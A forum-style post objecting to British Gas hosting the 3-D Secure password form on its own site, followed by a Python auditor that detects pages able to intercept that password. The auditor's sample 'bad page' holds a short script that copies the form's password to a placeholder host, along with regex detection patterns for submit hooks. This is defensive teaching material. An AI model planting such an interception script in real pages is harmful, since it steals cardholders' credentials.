Clicksafe: British Gas Man in the Middle

I just tried to pay my British Gas bill online, but had to abandon the payment because the Clicksafe form came from British Gas, not from the card issuer. I'm beginning to wonder if Visa/Clicksafe/3D Secure are giving unsound advice to payment services.

The basic problem is that the challenge phrase is useless as a security measure, as it is easy for a man in the middle to obtain, even if they are not an authorised payment service. One can check to where the form submits, but it is not easy to check whether that will be subverted by scripting. Therefore the only way of ensuring that the password only goes to the card issuer is to make sure that the form has SSL certificates for the card issuer.

At least as of about a month ago, SagePay also had this problem.

Fortunately, an increasing number of companies are accepting push payments. British Gas always have, although their online system didn't want to reveal the details.

David Woolley
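The two checks the post describes (where the password form actually submits, and whether page scripting could intercept the submission before the browser posts it) can be approximated with a static audit of the checkout page. The following is an added example, not code from the original post or from any payment provider; the host names, the page markup and the interception script are constructed for illustration, and the set of acceptable issuer hosts is an assumption you would have to supply yourself.

```python
"""Static audit of a card-verification (3-D Secure style) form on a checkout page.

Added example, not from the original post.  It shows why "check where the
form submits" is necessary but not sufficient: a form whose action points at
the issuer can still have its password copied elsewhere by script hooks.
All host names below are hypothetical placeholders.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Inline-script patterns that can hijack or duplicate a form submission
# before the browser sends it to the form's declared action.
_HOOK_PATTERNS = (
    r"addEventListener\(\s*['\"]submit['\"]",
    r"\.onsubmit\s*=",
    r"\.action\s*=",
    r"XMLHttpRequest|fetch\(",
    r"document\.forms",
)


class _FormParser(HTMLParser):
    """Collects every form, its inputs and every script on the page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self.inline_scripts = []
        self.external_scripts = []
        self._form = None
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {
                "action": urljoin(self.page_url, a.get("action") or ""),
                "onsubmit": a.get("onsubmit"),
                "inputs": [],
            }
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append(((a.get("type") or "text").lower(), a.get("name")))
        elif tag == "script":
            self._in_script = True
            if a.get("src"):
                self.external_scripts.append(urljoin(self.page_url, a["src"]))

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline_scripts.append(data)


def audit_payment_page(page_url, html, issuer_hosts):
    """Return one report per form that asks for a secret (a password input).

    issuer_hosts: lower-case host names you are prepared to send the challenge
    password to, i.e. the card issuer's verification server, not the merchant.
    """
    p = _FormParser(page_url)
    p.feed(html)
    page_host = (urlparse(page_url).hostname or "").lower()
    reports = []
    for f in p.forms:
        if not any(t == "password" for t, _ in f["inputs"]):
            continue
        u = urlparse(f["action"])
        host = (u.hostname or "").lower()
        warnings = []
        if u.scheme != "https":
            warnings.append("form action is not https")
        if host not in issuer_hosts:
            warnings.append(f"password would be posted to {host}, not the card issuer")
        # Even a correct action can be overridden or duplicated by script.
        if f["onsubmit"]:
            warnings.append("form has an inline onsubmit handler")
        if any(re.search(pat, s) for s in p.inline_scripts for pat in _HOOK_PATTERNS):
            warnings.append("inline script hooks form submission or makes network calls")
        for src in p.external_scripts:
            h = (urlparse(src).hostname or "").lower()
            if h not in issuer_hosts:
                warnings.append(f"third-party script loaded from {h} can read the form")
        reports.append({
            "served_by": page_host,
            "action_host": host,
            "goes_to_issuer": u.scheme == "https" and host in issuer_hosts,
            "safe_to_type_password": not warnings,
            "warnings": warnings,
        })
    return reports


# Constructed sample pages (hypothetical hosts, not real issuer or merchant domains).
ISSUER_HOSTS = {"acs.issuer-bank.example"}

GOOD_PAGE = """<html><body>
<form action="https://acs.issuer-bank.example/verify" method="post">
  <input type="hidden" name="PaReq" value="opaque-blob">
  <input type="password" name="challenge">
  <input type="submit" value="Continue">
</form></body></html>"""

BAD_PAGE = """<html><body>
<script src="https://www.merchant.example/checkout.js"></script>
<form action="https://acs.issuer-bank.example/verify" method="post"
      onsubmit="return relay(this)">
  <input type="password" name="challenge">
</form>
<script>
  function relay(f) {
    fetch('https://www.merchant.example/log', {method: 'POST', body: new FormData(f)});
    return true;
  }
</script></body></html>"""

if __name__ == "__main__":
    for url, page in (("https://acs.issuer-bank.example/challenge", GOOD_PAGE),
                      ("https://www.merchant.example/pay", BAD_PAGE)):
        for r in audit_payment_page(url, page, ISSUER_HOSTS):
            print(url, r)
```

The second sample is the case the post worries about: the form's action genuinely points at the issuer, so a glance at where it submits looks fine, yet an onsubmit handler and a merchant-hosted script copy the password elsewhere first. That is why the audit reports `goes_to_issuer` and `safe_to_type_password` separately, and why the post's conclusion (the page itself must be served under the issuer's certificate, not merely post to it) is the only check that holds up.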
